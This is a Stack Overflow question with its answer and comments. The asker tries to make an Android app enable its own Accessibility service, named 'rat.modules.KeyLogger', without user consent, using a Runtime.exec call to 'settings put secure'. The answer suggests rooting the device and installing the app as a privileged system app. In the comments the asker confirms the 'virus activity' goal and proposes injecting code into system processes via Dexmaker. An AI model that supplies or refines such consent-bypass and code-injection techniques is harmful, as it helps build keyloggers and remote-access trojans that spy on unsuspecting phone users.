# Enabling my app to get Accessibility Permissions by itself

Tags: java, android, process, android-security, accessibility

I am trying to bypass Android Security and enabling my Application to get Accessibility Permissions without asking the user to do it.
Searching around in StackOverflow i found out that is possible, click [here](https://stackoverflow.com/questions/10061154/how-to-programmatically-enable-disable-accessibility-service-in-android) to see, by using the `InstrumentationRegistry`, however that class is now deprecated and so i started using the `Process` class and launching the method you can see above:

```
String packageName = "com.example.rat";
String serviceName = packageName+"/"+"rat.modules.KeyLogger";
String service = "enabled_accessibility_services";
String cmd = "settings put secure "+service+" "+serviceName;
System.out.println("Command: "+cmd);
Scanner s = new Scanner(cmd);
s.useDelimiter(" ");
Process p = Runtime.getRuntime().exec(new String[]{s.next(),s.next(),s.next(),s.next(),s.next()});
String error = "";
String line = "";
BufferedReader br = new BufferedReader(new InputStreamReader(p.getErrorStream()));
while ((line = br.readLine()) != null) {
    error += line;
}
System.out.println("Response: "+error);
```

The error i get from the previously shown code is here:

> Security exception: You either need MANAGE_USERS or CREATE_USERS permission to: query userjava.lang.SecurityException: You either need MANAGE_USERS or CREATE_USERS permission to: query user at com.android.server.pm.UserManagerService.checkManageOrCreateUsersPermission(UserManagerService.java:1854)    at com.android.server.pm.UserManagerService.getUserInfo(UserManagerService.java:1039)   at android.os.UserManager.getUserInfo(UserManager.java:1366)    at com.android.providers.settings.SettingsService$MyShellCommand.onCommand(SettingsService.java:273)    at android.os.ShellCommand.exec(ShellCommand.java:96)   at com.android.providers.settings.SettingsService.onShellCommand(SettingsService.java:51)   at android.os.Binder.shellCommand(Binder.java:581)  at android.os.Binder.onTransact(Binder.java:481)    at android.os.Binder.execTransact(Binder.java:682)

Is there anyway to bypass it? i am open to every kind of idea.

Answer (score 2):

Only system apps can use this permission.
If your phone is rooted, move your app at /system/priv-app folder
The permissions you need are

```
<uses-permission android:name="android.permission.INTERACT_ACROSS_USERS" />
```

and

```
<uses-permission android:name="android.permission.MANAGE_USERS" />
```

Comment: I give a  +1 for the answer(that can be helpful), but in the link i gave in the question someone said that it is possible to do it without your application being a system app, i am thinking of opening an OutputStream in a System app process and send commands through it, is this possible?

Comment: No, it cannot be done this way. I am writting system apps for a company, I know. 
For the second one you say, if you have a system app that can wait your commands and execute them, this is another story. Of course a lot of things are changing for every new Android version. At newer versions restricts developers at a lot of points

Comment: Ok, my second idea was to start a system app via intent and inject code in the process, but i don't know if this is possible.

Comment: This sounds like virus activity :) I never check it if can be done, but think about that every process has it own protected memory. So this will cause a memory protection fault.

Comment: That's what i am trying to achive, thanks for the help, if you got some news about this topic please let me updated.

Comment: I found out Dexmaker that is ment to do what i said before(inject code into a running app).